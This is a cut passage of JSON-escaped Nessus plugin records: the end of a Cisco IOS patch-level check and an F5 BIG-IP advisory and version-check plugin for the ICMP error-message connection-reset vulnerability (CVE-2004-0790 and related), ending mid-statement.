exit(0);\n}\n# Affected: 12.2DA\nif (check_release(version: version,\n patched: make_list(\"12.2(12)DA8\") )) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2DD\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2DX\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\n# Affected: 12.2EU\nif (check_release(version: version,\n patched: make_list(\"12.2(20)EU\"))) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\n# Affected: 12.2EW\nif (check_release(version: version,\n patched: make_list(\"12.2(18)EW3\") )) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\n# Affected: 12.2EWA\nif (check_release(version: version,\n patched: make_list(\"12.2(25)EWA\") )) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2EX\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(25)SEB or later\\n'); exit(0);\n}\n# Affected: 12.2EY\nif (check_release(version: version,\n patched: make_list(\"12.2(25)EY\") )) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2JA\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(4)JA or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2JK\")) {\n security_warning(port:0, extra: '\\nNo fixes are available for 12.2JK releases. Upgrade to a supported release\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2MB\")) {\n security_warning(port:0, extra: '\\nNo fixes are available for 12.2MB releases. Upgrade to a supported release\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2MC\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\n# Affected: 12.2S\nif (check_release(version: version,\n patched: make_list(\"12.2(14)S13\", \"12.2(18)S8\", \"12.2(20)S7\", \"12.2(25)S3\") )) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\n# Affected: 12.2SE\nif (check_release(version: version,\n patched: make_list(\"12.2(25)SEB\"))) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\n# Affected: 12.2SO\nif (check_release(version: version,\n patched: make_list(\"12.2(18)SO1\") )) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2SU\")) {\n security_warning(port:0, extra: '\\nNo fixes are available for 12.2SU releases. Upgrade to a supported release\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2SV\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(25)S3 or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2SW\")) {\n security_warning(port:0, extra: '\\nNo fixes are available for 12.2SU releases. Upgrade to a supported release\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2SX\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(17d)SXB7 or later\\n'); exit(0);\n}\n# Affected: 12.2SXA and 12.2SXB\nif ((\"SXA\" >< version || \"SXB\" >< version) &&\n check_release(version: version,\n patched: make_list(\"12.2(17d)SXB7\") )) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(17d)SXB7 or later\\n'); exit(0);\n}\n# Affected: 12.2SXD\nif (\"SXD\" >< version &&\n check_release(version: version,\n patched: make_list(\"12.2(18)SXD4\") )) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2SY\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(17d)SXB7 or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2SZ\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(20)S7 or later\\n'); exit(0);\n}\n# Affected: 12.2T\nif (check_release(version: version,\n patched: make_list(\"12.2(15)T15\") )) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2XA\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2XB\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2XC\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2XD\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2XE\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2XF\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(15)BC2f or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2XG\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2XH\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2XI\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2XJ\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2XK\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2XL\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2XM\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2XN\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2XQ\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2XR\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(4)JA or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2XT\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2XU\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2XW\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\n# Affected: 12.2YA\nif (check_release(version: version,\n patched: make_list(\"12.2(4)YA9\") )) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2YB\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2YC\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2YD\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2YE\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(25)S3 or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2YF\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2YG\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2YH\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2YJ\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2YK\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2YL\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2YM\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2YN\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2YO\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(17d)SXB7 or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2YQ\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2YR\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2YT\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2YU\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2YV\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2YW\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2YX\")) {\n security_warning(port:0, extra: '\\nNo fixes are available for 12.2YX releases. Upgrade to a supported release\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2YY\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2YZ\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(20)S7 or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2ZA\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.2(17d)SXB7 or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2ZB\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2ZC\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2ZD\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2ZE\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(13) or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2ZF\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2ZG\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\n# Affected: 12.2ZH\nif (check_release(version: version,\n patched: make_list(\"12.2(13)ZH6\") )) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2ZJ\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2ZK\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\n# Affected: 12.2ZL\nif (check_release(version: version,\n patched: make_list(\"12.2(15)ZL2\") )) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2ZN\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.2ZP\")) {\n security_warning(port:0, extra: '\\nNo fixes are available for 12.2ZP releases. Upgrade to a supported release\\n'); exit(0);\n}\n# Affected: 12.3\nif (check_release(version: version,\n patched: make_list(\"12.3(3h)\", \"12.3(5e)\", \"12.3(6e)\", \"12.3(9d)\", \"12.3(10c)\", \"12.3(12b)\", \"12.3(13a)\", \"12.3(13)\"))) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.3B\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\n# Affected: 12.3BC\nif (check_release(version: version,\n patched: make_list(\"12.3(9a)BC2\") )) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.3BW\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(7)T8 or later\\n'); exit(0);\n}\n# Affected: 12.3JA\nif (check_release(version: version,\n patched: make_list(\"12.3(4)JA\"))) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\n# Affected: 12.3T\nif (check_release(version: version,\n patched: make_list(\"12.3(7)T8\", \"12.3(8)T7\", \"12.3(11)T4\", \"12.3(14)T\"))) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.3XA\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.3XB\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\n# Affected: 12.3XC\nif (check_release(version: version,\n patched: make_list(\"12.3(2)XC3\") )) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.3XD\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.3XE\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.3XF\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.3XG\")) {\n security_warning(port:0, extra: '\\nNo fixes are available for 12.3XG releases. Upgrade to a supported release\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.3XH\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\n# Affected: 12.3XI\nif (check_release(version: version,\n patched: make_list(\"12.3(7)XI3\") )) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.3XJ\")) {\n security_warning(port:0, extra: '\\nNo fixes are available for 12.3XJ releases. Upgrade to a supported release\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.3XK\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.3XL\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.3XM\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.3XQ\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.3XR\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.3XS\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.3XT\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(4)JA or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.3XU\")) {\n security_warning(port:0, extra: '\\nNo fixes are available for 12.3XU releases. Upgrade to a supported release\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.3XW\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(11)YF2 or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.3XX\")) {\n security_warning(port:0, extra: '\\nUpdate to 12.3(14)T or later\\n'); exit(0);\n}\n# Affected: 12.3XY\nif (check_release(version: version,\n patched: make_list(\"12.3(8)XY4\") )) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.3YA\")) {\n security_warning(port:0, extra: '\\nNo fixes are available for 12.3YA releases. Upgrade to a supported release\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.3YD\")) {\n security_warning(port:0, extra: '\\nNo fixes are available for 12.3YD releases. Upgrade to a supported release\\n'); exit(0);\n}\n# Affected: 12.3YF\nif (check_release(version: version,\n patched: make_list(\"12.3(11)YF2\") )) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\n# Affected: 12.3YG\nif (check_release(version: version,\n patched: make_list(\"12.3(8)YG1\") )) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.3YH\")) {\n security_warning(port:0, extra: '\\nNo fixes are available for 12.3YH releases. Upgrade to a supported release\\n'); exit(0);\n}\n# Affected: 12.3YI\nif (check_release(version: version,\n patched: make_list(\"12.3(8)YI\"))) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\nif (deprecated_version(version, \"12.3YJ\")) {\n security_warning(port:0, extra: '\\nNo fixes are available for 12.3YJ releases. Upgrade to a supported release\\n'); exit(0);\n}\n# Affected: 12.3YK\nif (check_release(version: version,\n patched: make_list(\"12.3(11)YK\"))) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\n# Affected: TCPv6\nif (check_release(version: version,\n patched: make_list(\"12.3(11)YK\") )) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\n# Affected: 12.3YN\nif (check_release(version: version,\n patched: make_list(\"12.3(11)YN\"))) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\n# Affected: 12.3YQ\nif (check_release(version: version,\n patched: make_list(\"12.3(14)YQ\"))) {\n security_warning(port:0, extra: '\\nUpdate to ' + patch_update + ' or later\\n'); exit(0);\n}\n\nexit(0, \"The remote host is not affected\");\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-08-19T12:37:08", "description": "The vulnerability described in this article was initially fixed in earlier versions, but a regression was reintroduced in BIG-IP 12.x through13.x. For information about earlier versions, refer toK4583:\nInsufficient validation of ICMP error messages - VU#222750 / CVE-2004-0790(9.x - 10.x).\n\nMultiple TCP/IP and ICMP implementations allow remote attackers to cause a denial of service (reset TCP connections) via spoofed ICMP error messages, aka the 'blind connection-reset attack.' NOTE:\nCVE-2004-0790, CVE-2004-0791, and CVE-2004-1060 have been SPLIT based on different attacks; CVE-2005-0065, CVE-2005-0066, CVE-2005-0067, and CVE-2005-0068 are related identifiers that are SPLIT based on the underlying vulnerability. While CVE normally SPLITs based on vulnerability, the attack-based identifiers exist due to the variety and number of affected implementations and solutions that address the attacks instead of the underlying vulnerabilities. (CVE-2004-0790)\n\nImpact\n\nA remote attacker can interfere with the Path MTU Discovery process and cause a performance degradation or reset of FastL4 accelerated TCP connections by spoofing a specifically craftedInternet Control Message Protocol (ICMP) message.\n\nThis vulnerability only applies to FastL4 virtual servers on BIG-IP platforms with the embedded Packet Velocity Acceleration (ePVA) chip.The ePVA chip is a hardware acceleration Field Programmable Gate Array (FPGA) that delivers high-performance Layer 4 (L4) IPv4 throughput. ePVA chips are included on the following BIG-IP platforms :\n\nB2100 Blade in the VIPRION C2400 or C2200 Chassis\n\nB2150 Blade in the VIPRION C2400 or C2200 Chassis\n\nB2250 Blade in the VIPRION C2400 or C2200 Chassis\n\nB4300 Blade in the VIPRION C4480 or C4800 Chassis\n\nB4340 Blade in the VIPRION C4480 or C4800 Chassis\n\nBIG-IP 12000 series\n\nBIG-IP 10000 series\n\nBIG-IP 7000 series\n\nBIG-IP 5000 series\n\nBIG-IP i5000 series\n\nBIG-IP i7000 series\n\nBIG-IP i10000 series", "cvss3": {"score": null, "vector": null}, "published": "2017-05-08T00:00:00", "type": "nessus", "title": "F5 Networks BIG-IP : Insufficient validation of ICMP error messages (K23440942)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2004-0790", "CVE-2004-0791", "CVE-2004-1060", "CVE-2005-0065", "CVE-2005-0066", "CVE-2005-0067", "CVE-2005-0068"], "modified": "2019-05-09T00:00:00", "cpe": ["cpe:/a:f5:big-ip_access_policy_manager", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_application_visibility_and_reporting", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", "cpe:/h:f5:big-ip"], "id": "F5_BIGIP_SOL23440942.NASL", "href": "https://www.tenable.com/plugins/nessus/100000", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K23440942.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(100000);\n script_version(\"3.6\");\n script_cvs_date(\"Date: 2019/05/09 9:52:02\");\n\n script_cve_id(\"CVE-2004-0790\", \"CVE-2004-0791\", \"CVE-2004-1060\", \"CVE-2005-0065\", \"CVE-2005-0066\", \"CVE-2005-0067\", \"CVE-2005-0068\");\n script_bugtraq_id(13124);\n\n script_name(english:\"F5 Networks BIG-IP : Insufficient validation of ICMP error messages (K23440942)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The vulnerability described in this article was initially fixed in\nearlier versions, but a regression was reintroduced in BIG-IP 12.x\nthrough13.x. For information about earlier versions, refer toK4583:\nInsufficient validation of ICMP error messages - VU#222750 /\nCVE-2004-0790(9.x - 10.x).\n\nMultiple TCP/IP and ICMP implementations allow remote attackers to\ncause a denial of service (reset TCP connections) via spoofed ICMP\nerror messages, aka the 'blind connection-reset attack.' NOTE:\nCVE-2004-0790, CVE-2004-0791, and CVE-2004-1060 have been SPLIT based\non different attacks; CVE-2005-0065, CVE-2005-0066, CVE-2005-0067, and\nCVE-2005-0068 are related identifiers that are SPLIT based on the\nunderlying vulnerability. While CVE normally SPLITs based on\nvulnerability, the attack-based identifiers exist due to the variety\nand number of affected implementations and solutions that address the\nattacks instead of the underlying vulnerabilities. (CVE-2004-0790)\n\nImpact\n\nA remote attacker can interfere with the Path MTU Discovery process\nand cause a performance degradation or reset of FastL4 accelerated TCP\nconnections by spoofing a specifically craftedInternet Control Message\nProtocol (ICMP) message.\n\nThis vulnerability only applies to FastL4 virtual servers on BIG-IP\nplatforms with the embedded Packet Velocity Acceleration (ePVA)\nchip.The ePVA chip is a hardware acceleration Field Programmable Gate\nArray (FPGA) that delivers high-performance Layer 4 (L4) IPv4\nthroughput. ePVA chips are included on the following BIG-IP \nplatforms :\n\nB2100 Blade in the VIPRION C2400 or C2200 Chassis\n\nB2150 Blade in the VIPRION C2400 or C2200 Chassis\n\nB2250 Blade in the VIPRION C2400 or C2200 Chassis\n\nB4300 Blade in the VIPRION C4480 or C4800 Chassis\n\nB4340 Blade in the VIPRION C4480 or C4800 Chassis\n\nBIG-IP 12000 series\n\nBIG-IP 10000 series\n\nBIG-IP 7000 series\n\nBIG-IP 5000 series\n\nBIG-IP i5000 series\n\nBIG-IP i7000 series\n\nBIG-IP i10000 series\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K23440942\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K4583\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution K23440942.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2004/04/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"K23440942\";\nvmatrix = make_array();\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# AFM\nvmatrix[\"AFM\"] = make_array();\nvmatrix[\"AFM\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.2\");\nvmatrix[\"AFM\"][\"unaffected\"] = make_list(\"13.0.0HF1\",\"12.1.2HF1\",\"11.4.0-11.6.1\");\n\n# AM\nvmatrix[\"AM\"] = make_array();\nvmatrix[\"AM\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.2\");\nvmatrix[\"AM\"][\"unaffected\"] = make_list(\"13.0.0HF1\",\"12.1.2HF1\",\"11.4.0-11.6.1\");\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.2\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"13.0.0HF1\",\"12.1.2HF1\",\"11.4.0-11.6.1\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.2\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"13.0.0HF1\",\"12.1.2HF1\",\"11.4.0-11.6.1\");\n\n# AVR\nvmatrix[\"AVR\"] = make_array();\nvmatrix[\"AVR\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.2\");\nvmatrix[\"AVR\"][\"unaffected\"] = make_list(\"13.0.0HF1\",\"12.1.2HF1\",\"11.4.0-11.6.1\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.2\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"13.0.0HF1\",\"12.1.2HF1\",\"11.4.0-11.6.1\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.2\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"13.0.0HF1\",\"12.1.2HF1\",\"11.4.0-11.6.1\");\n\n# PEM\nvmatrix[\"PEM\"] = make_array();\nvmatrix[\"PEM\"][\"affected\" ] = make_list(\"13.0.0\",\"12.0.0-12.1.2\");\nvmatrix[\"PEM\"][\"unaffected\"] = make_list(\"13.0.0HF1\",\"12.1.2HF1\",\"11.4.0-11.6.1\");\n\n\nif 